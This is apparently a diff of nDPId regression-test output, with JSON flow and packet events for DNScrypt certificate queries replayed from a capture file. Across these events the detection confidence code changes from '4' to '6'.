01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":946739311153,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAAIctENAAL0RBKMKAAABzbl0dJffAikCCAUEnSsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38879,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38879,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":194,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":43528,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":946739311153,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAAIctERAAL0RBKIKAAABzbl0dKoIAikCCAUEnSkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":43528,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":43528,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":51770,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":946739311153,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAAXctEUgAL0RIOEKAAABzbl0dMo6AikGBP1vnSoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":51770,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":51770,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38278,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":946739311153,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAAXctEYgAL0RIOAKAAABzbl0dJWGAikGBDIonSYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38278,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38278,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":197,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739311153} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":197,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAABQtEUAub0RRbQKAAABzbl0dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":198,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739311153} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":198,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAABQtEYAub0RRbMKAAABzbl0dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":55822,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":946739311153,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAAXctEcgAL0RIN8KAAABzbl0dNoOAikGBO2dnSgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":55822,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":55822,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":200,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739311153} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":200,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAABQtEcAub0RRbIKAAABzbl0dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
